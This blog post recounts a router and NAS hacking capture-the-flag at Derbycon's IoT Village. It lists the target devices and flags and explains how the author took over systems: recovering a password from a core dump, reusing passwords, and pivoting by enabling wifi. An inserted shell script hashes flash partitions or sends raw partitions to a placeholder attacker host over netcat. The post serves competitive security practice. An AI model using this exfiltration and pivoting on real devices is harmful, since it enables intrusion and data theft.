Wednesday, October 7, 2015

Derbycon IoT Village CTF

Due to winning the BSidesCharm Wireless CTF, I missed out on Independent Security Evaluators' SOHO Router Hacking Workshop, which was a very enticing subject for me. I also missed out on attending Defcon due to a job change, and thus missed the IoT Village run by the same organization. Come Derbycon, I was determined to attend their session. Sadly, they weren't holding workshops at this convention.

I initially settled for capturing packets from their lab of IoT devices for a future post on the I See Dead Packets blog. I did capture a bunch of NetUSB broadcasts along with other protocols, which will lead into that post.

As for the CTF itself, the environment was split into three networks, with the participants directly attached to the first. Many of the devices on Networks 2 and 3 had misconfigured gateways, so the only way to reach them was to pivot through an already-compromised system on that subnet. I've broken the device list down by the network each was found on, and added links to ISE's case studies (which include exploits).

Network 1
TP-Link TL-WR1043ND FLAG: (md5 of /dev/mtdblock1) - 1000 points
Belkin F5D8236-4v2 FLAG: password hash & settings page screenshot - 1000 points
Netgear WNR3500Lv2 FLAG: (md5 of /dev/mtd1) - 1000 points
D-Link DIR-865L FLAG: (md5 of /dev/mtd0) - 1000 points
Trendnet TEW-812DRU FLAG: (md5 of /dev/mtdblock0) - 1000 points
Asus RT-AC66U FLAG: (md5 of /dev/mtdblock2) - 1000 points
Trendnet TN-200 FLAG: (md5 of /dev/mtd0) - 1000 points

Network 2
D-Link DNS-345 FLAG: (md5 of /dev/mtd0) - 2000 points
Seagate SRN02D FLAG: (md5 of /dev/mtd0) - 2000 points
PogoPlug Mobile FLAG: (md5 of /dev/mtd0) - 2000 points
Belkin F7D7301v1 FLAG: password hash & settings page screenshot - 2000 points
Netgear WNDR4700 FLAG: (md5 of /dev/mtd1) - 2000 points

Network 3
WD My Cloud EX4 FLAG: (md5 of /dev/mtd0) - 3000 points
Netgear ReadyNAS FLAG: (md5 of /dev/mtd0) - 3000 points
Belkin F9K1104v1 FLAG: password hash & settings page screenshot - 3000 points
Cisco (Linksys EA6500) FLAG: (md5 of /dev/mtdblock0) - 3000 points

Additionally, a host on Network 1 was configured as an administrator that would click any link sent to it, supporting many of the CSRF vulnerabilities discovered by ISE.

Getting admin access to the web interface wasn't enough, as most of the flags required access to the underlying Linux system. The real challenge, I found, wasn't in exploiting the systems but in hashing or exfiltrating the flash partition for hashing: stripped-down router shells often lack md5sum entirely. Protip: have md5sum/openssl, utelnetd, and uftpd compiled for both ARM and MIPS systems.
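As an added example (not from the original post, and not ISE's or the CTF's material), the following POSIX shell snippet shows the two paths a player ends up taking once they have a shell on a device: hash the flag partition locally with whatever tool happens to exist, or, when nothing on the box can hash, stream the raw partition to a listener and hash it on the attacker side. The device path, attacker IP and port are placeholders; `/proc/mtd` is consulted only to map partition names to `/dev/mtdN` numbers.

```shell
#!/bin/sh
# Added example: hash a flash partition on a minimal embedded Linux box,
# falling back to exfiltration when no hashing tool is present.
# Device paths, host and port are placeholders, not values from the CTF.

# Show the partition table so /dev/mtdN can be matched to its name
# (e.g. "u-boot", "kernel", "rootfs"). Harmless if /proc/mtd is absent.
list_mtd() {
    [ -r /proc/mtd ] && cat /proc/mtd
}

# Print the MD5 of a file or block device using the first tool available:
# coreutils md5sum, a busybox applet, or openssl. Returns 1 and prints
# nothing if the box has none of them (the caller should exfiltrate instead).
flag_md5() {
    src="$1"
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$src" | cut -d' ' -f1
    elif command -v busybox >/dev/null 2>&1 && busybox --list 2>/dev/null | grep -qx md5sum; then
        busybox md5sum "$src" | cut -d' ' -f1
    elif command -v openssl >/dev/null 2>&1; then
        # openssl prints "MD5(path)= <hex>"; keep only the digest.
        openssl dgst -md5 "$src" | sed 's/^.*= //'
    else
        return 1
    fi
}

# Push the raw partition to a listener when nothing on the box can hash it.
# dd is nearly always present; nc usually is via busybox. Listener side:
#   nc -l -p 4444 > mtd0.bin && md5sum mtd0.bin      (busybox/traditional nc)
#   nc -l 4444 > mtd0.bin && md5sum mtd0.bin         (BSD/OpenBSD nc)
# Read the device in large blocks; the listener's md5sum is the flag.
exfil_partition() {
    dev="$1"; host="$2"; port="$3"
    dd if="$dev" bs=64k 2>/dev/null | nc "$host" "$port"
}

# Usage on the target:  sh flag.sh /dev/mtd0 [attacker_ip [port]]
if [ -n "$1" ]; then
    list_mtd
    if h=$(flag_md5 "$1"); then
        echo "FLAG $1 $h"
    elif [ -n "$2" ]; then
        exfil_partition "$1" "$2" "${3:-4444}"
    else
        echo "no md5 tool on this box; rerun as: $0 $1 <attacker_ip> [port]" >&2
        exit 1
    fi
fi
```

Two practical caveats: the digest is only a usable flag for a partition whose contents do not change underneath you (hashing a writable config or overlay partition after you have enabled telnet may not match what the organizers recorded), and `nc` flag syntax differs between busybox, traditional and BSD builds, so confirm the listener form before streaming several megabytes through a slow pivot.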

Fortune smiled upon me early on when I crashed the web server on one of the devices I was attempting to exploit. I was able to transfer the core dump off the box via Samba and recover the admin password from it. The passwords on most of the systems followed a similar pattern, so without any additional exploits I was able to log into roughly 80% of the devices and often enable telnet or SSH.

While many of the systems were wifi routers, they were configured with their wireless radios disabled. At one point, frustrated with pivoting through an SSH tunnel, it occurred to me that I could simply enable wifi and set the security key to one of my choosing. This gave me direct access to Network 3.

Lastly, I'd like to give a shout-out to my rivals Powerword Hack, as they were a fun bunch of guys to play against and made my time at the CTF feel less isolated. It turns out that our skills were complementary: there were very few systems that we both scored points on, and it often felt like we each held half of a puzzle but didn't collaborate because of the competition. Had we joined forces, I feel confident we could have grabbed every flag in the challenge.

I used the Amazon Gift card from this event to purchase:

I'll end this post with a talk given by an ISE engineer at Derbycon, for those who, like me, are interested in exploring the Internet of Things.

About Crimson Agents

Formed in 2013, Crimson Agents is a DC-based recreational security team that competes in various computer security wargames and hacker jeopardy contests. Our team consists of professionals seeking to practice and enhance their skills in penetration testing, vulnerability development, computer network defense, forensics, and reverse engineering. In addition to exploitation-based CTFs, we also compete in Wireless CTFs, with several members who focus solely on this domain. Our sister team Threat Inc focuses on defensive exercises such as malware analysis, forensics, honeypots, and network captures. We reuse what we learn from our "Blue Team" research to make our "Red Team" operations more effective, and vice versa.